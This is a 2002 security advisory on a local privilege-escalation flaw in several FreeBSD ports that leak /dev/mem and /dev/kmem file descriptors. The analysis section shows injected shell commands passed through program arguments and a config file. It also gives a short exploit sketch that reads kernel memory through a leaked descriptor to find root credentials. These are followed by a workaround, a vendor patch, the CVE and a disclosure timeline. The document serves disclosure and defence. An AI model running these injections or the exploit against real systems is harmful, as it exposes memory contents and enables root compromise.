// back

FreeBSD Ports libkvm Security Vulnerabilities

09.16.02

BACKGROUND

The FreeBSD Project's FreeBSD Ports and Packages Collection offers a simple way for users and administrators to install applications. More information about it is available at http://www.freebsd.org/ports/.

DESCRIPTION

The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2 can be locally manipulated to take advantage of open file descriptors /dev/mem and /dev/kmem to gain root privileges on a target host. These five programs are installed setgid kmem by default. They will drop kmem privileges before executing user specified commands but file descriptors to /dev/mem and /dev/kmem will remain open. This can lead to a local root compromise in various ways (e.g. if an attacker chooses to scan for the master password file in the Linux kernel memory).

ANALYSIS

The following examples illustrate the vulnerabilities:

ascpu

bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep
dummy|grep mem"

dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bubblemon

bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep
dummy|grep mem"

dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

wmmon

bash-2.05a$ cat .wmmonrc
left "/home/dim/dummy"
bash-2.05a$ wmmon &
[1] 793
bash-2.05a$ Monitoring 5 devices for activity.
current stat is :1

bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem
dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem

wmnet2

bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep
dummy|grep mem"
wmnet: using kmem driver to monitor ec0
dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem


One possible exploit for these vulnerabilities is to replace getch() in strings(1) with:

int getch()
{
char buf[4];
read(4,buf,1);
return buf[0];
}

or a similar, less CPU-expensive function that reads a character from the /dev/mem file descriptor and execute the following:

wmnet2 -e exploit|grep root|grep Charlie

DETECTION

The latest copies of asmon, ascpu, bubblemon, wmmon, and wmnet2 from the FreeBSD ports collection are vulnerable and were tested on 4.6-RELEASE of FreeBSD. According to FreeBSD, all FreeBSD ports that use libkvm before and including 4.6.2-RELEASE may be vulnerable.

WORKAROUND

Remove the setgid bit on the affected applications via the command chmod g-s /path.to/wmnet2.

VENDOR RESPONSE

FreeBSD advisory FreeBSD-SA-02:39.libkvm, which is available at ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-
02:39.libkvm.asc, provides the following patch details:

"Upgrade your vulnerable system to 4.6-STABLE; or to the
RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch
dated after the correction date (4.6.2-RELEASE-p2, 4.5-
RELEASE-p20, or 4.4-RELEASE-p27)."

CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project assigned the identification number CAN-2002-1125 for these issues.

DISCLOSURE TIMELINE

08/12/2002 Issue disclosed to iDEFENSE
09/06/2002 FreeBSD Security notified
09/06/2002 iDEFENSE clients notified
09/16/2002 Coordinated public disclosure by FreeBSD and iDEFENSE

CREDIT

badc0ded (badc0ded@badc0ded.com) is credited with discovering these vulnerabilities.